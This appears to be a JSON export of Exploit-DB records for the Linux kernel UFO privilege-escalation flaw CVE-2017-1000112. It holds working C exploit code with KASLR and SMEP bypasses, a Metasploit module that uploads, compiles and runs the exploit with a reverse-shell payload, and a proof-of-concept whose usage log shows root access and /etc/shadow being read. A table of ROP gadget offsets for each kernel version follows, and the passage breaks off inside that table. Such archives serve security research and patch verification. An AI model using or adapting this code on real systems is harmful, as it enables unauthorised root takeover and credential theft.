sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar path[512] = \"/boot/System.map-\";\r\n\tchar version[32];\r\n\r\n\tstruct utsname u;\r\n\tu = get_kernel_version();\r\n\tstrcat(path, u.release);\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_mincore() {\r\n\tunsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n\tunsigned long iterations = 20000000;\r\n\tunsigned long addr = 0;\r\n\r\n\tdprintf(\"[.] trying mincore info leak...\\n\");\r\n\t/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n\tif (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\r\n\t\tMAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\r\n\t\tdprintf(\"[-] mmap()\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tint i;\r\n\tfor (i = 0; i <= iterations; i++) {\r\n\t\t/* Touch a mishandle with this type mapping */\r\n\t\tif (mincore((void*)0x86000000, 0x1000000, buf)) {\r\n\t\t\tdprintf(\"[-] mincore()\\n\");\r\n\t\t\treturn 0;\r\n\t\t}\r\n\r\n\t\tint n;\r\n\t\tfor (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\r\n\t\t\taddr = *(unsigned long*)(&buf[n]);\r\n\t\t\t/* Kernel address space */\r\n\t\t\tif (addr > 0xffffffff00000000) {\r\n\t\t\t\taddr &= 0xffffffffff000000ul;\r\n\t\t\t\tif (munmap((void*)0x66000000, 0x20000000000))\r\n\t\t\t\t\tdprintf(\"[-] munmap()\\n\");\r\n\t\t\t\treturn addr;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tif (munmap((void*)0x66000000, 0x20000000000))\r\n\t\tdprintf(\"[-] munmap()\\n\");\r\n\r\n\tdprintf(\"[-] kernel base not found in mincore info leak\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n\tunsigned long addr = 0;\r\n\r\n\taddr = get_kernel_addr_kallsyms();\r\n\tif (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_sysmap();\r\n\tif (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_syslog();\r\n\tif (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_mincore();\r\n\tif (addr) return addr;\r\n\r\n\tdprintf(\"[-] KASLR bypass failed\\n\");\r\n\texit(EXIT_FAILURE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nstatic bool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n\tif (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tdprintf(\"[!] unprivileged user namespaces are not available\\n\");\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (unshare(CLONE_NEWNET) != 0) {\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/set_groups)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/uid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/gid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tdprintf(\"[-] sched_setaffinity()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\r\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo mtu 1500)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo up)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid exec_shell() {\r\n\tint fd;\r\n\r\n\tfd = open(\"/proc/1/ns/net\", O_RDONLY);\r\n\tif (fd == -1) {\r\n\t\tdprintf(\"error opening /proc/1/ns/net\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (setns(fd, CLONE_NEWNET) == -1) {\r\n\t\tdprintf(\"error calling setns\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsystem(SHELL);\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tdprintf(\"[.] checking if we got root\\n\");\r\n\tif (!is_root()) {\r\n\t\tdprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\tdprintf(\"[+] got r00t ^_^\\n\");\r\n\texec_shell();\r\n}\r\n\r\nint main(int argc, char** argv) {\r\n\tif (argc > 1) SHELL = argv[1];\r\n\r\n\tdprintf(\"[.] starting\\n\");\r\n\r\n\tdprintf(\"[.] checking kernel version\\n\");\r\n\tdetect_kernel();\r\n\tdprintf(\"[~] done, version looks good\\n\");\r\n\r\n\tdprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tdprintf(\"[~] done, looks good\\n\");\r\n\r\n\tdprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tdprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tdprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tdprintf(\"[~] done, kernel addr: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tdprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tdprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n\tunsigned long payload = (unsigned long)&get_root;\r\n\r\n#if ENABLE_SMEP_BYPASS\r\n\tdprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\r\n\tmmap_stack();\r\n\tpayload = XCHG_EAX_ESP_RET;\r\n\tdprintf(\"[~] done, fake stack mmapped\\n\");\r\n#endif\r\n\r\n\tdprintf(\"[.] executing payload %lx\\n\", payload);\r\n\toob_execute(payload);\r\n\tdprintf(\"[~] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47169"}, {"lastseen": "2018-08-03T19:32:31", "description": "Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit). CVE-2017-1000112. Local exploit for Linux platform. Tags: Metasploit Framewo...", "published": "2018-08-03T00:00:00", "type": "exploitdb", "title": "Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2018-08-03T00:00:00", "id": "EDB-ID:45147", "href": "https://www.exploit-db.com/exploits/45147/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Linux systems by abusing\r\n UDP Fragmentation Offload (UFO).\r\n\r\n This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\r\n 4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros\r\n based on Ubuntu, such as Linux Mint.\r\n\r\n The target system must have unprivileged user namespaces enabled\r\n and SMAP disabled.\r\n\r\n Bypasses for SMEP and KASLR are included. Failed exploitation\r\n may crash the kernel.\r\n\r\n This module has been tested successfully on various Ubuntu and Linux\r\n Mint systems, including:\r\n\r\n Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;\r\n Ubuntu 16.04 4.8.0-53-generic;\r\n Linux Mint 17.3 4.4.0-89-generic;\r\n Linux Mint 18 4.8.0-58-generic\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Andrey Konovalov', # Discovery and C exploit\r\n 'h00die', # Metasploit module\r\n 'Brendan Coles' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Aug 10 2017',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-1000112' ],\r\n [ 'EDB', '43418' ],\r\n [ 'BID', '100262' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ],\r\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],\r\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],\r\n [ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],\r\n [ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ ||\r\n version =~ /^4\\.8\\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n\r\n vprint_status 'Checking if SMAP is enabled ...'\r\n if smap_enabled?\r\n vprint_error 'SMAP is enabled'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'SMAP is not enabled'\r\n\r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('exploit.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('exploit.out')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit ...'\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\"\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path} ...\"\r\n rm_f executable_path\r\n rm_f payload_path\r\n end\r\nend", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45147/"}, {"lastseen": "2018-01-24T14:17:29", "description": "Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP). CVE-2017-1000112. Local exploit for Linux platform", "published": "2017-08-13T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2017-08-13T00:00:00", "id": "EDB-ID:43418", "href": "https://www.exploit-db.com/exploits/43418/", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-1000112.\r\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\r\n// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.\r\n//\r\n// EDB Note: Also included the work from ~ https://ricklarabee.blogspot.co.uk/2017/12/adapting-poc-for-cve-2017-1000112-to.html\r\n// Supports: Ubuntu Xenial (16.04) 4.4.0-81 \r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n// user@ubuntu:~$ whoami\r\n// user\r\n// user@ubuntu:~$ id\r\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] checking distro and kernel versions\r\n// [.] kernel version '4.8.0-58-generic' detected\r\n// [~] done, versions looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [~] done, kernel text: ffffffffae400000\r\n// [.] commit_creds: ffffffffae4a5d20\r\n// [.] prepare_kernel_cred: ffffffffae4a6110\r\n// [.] SMEP bypass enabled, mmapping fake stack\r\n// [~] done, fake stack mmapped\r\n// [.] executing payload ffffffffae40008d\r\n// [~] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# whoami\r\n// root\r\n// root@ubuntu:/home/user# id\r\n// uid=0(root) gid=0(root) groups=0(root)\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// sys:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// EDB Note: Details ~ http://www.openwall.com/lists/oss-security/2017/08/13/1\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <sched.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <linux/socket.h>\r\n#include <netinet/ip.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/utsname.h>\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_BYPASS\t\t1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\r\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* distro;\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t xchg_eax_esp_ret;\r\n\tuint64_t pop_rdi_ret;\r\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\r\n\tuint64_t mov_rax_cr4_ret;\r\n\tuint64_t neg_rax_ret;\r\n\tuint64_t pop_rcx_ret;\r\n\tuint64_t or_rax_rcx_ret;\r\n\tuint64_t xchg_eax_edi_ret;\r\n\tuint64_t mov_cr4_rdi_ret;\r\n\tuint64_t jmp_rcx;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\r\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\r\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\r\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 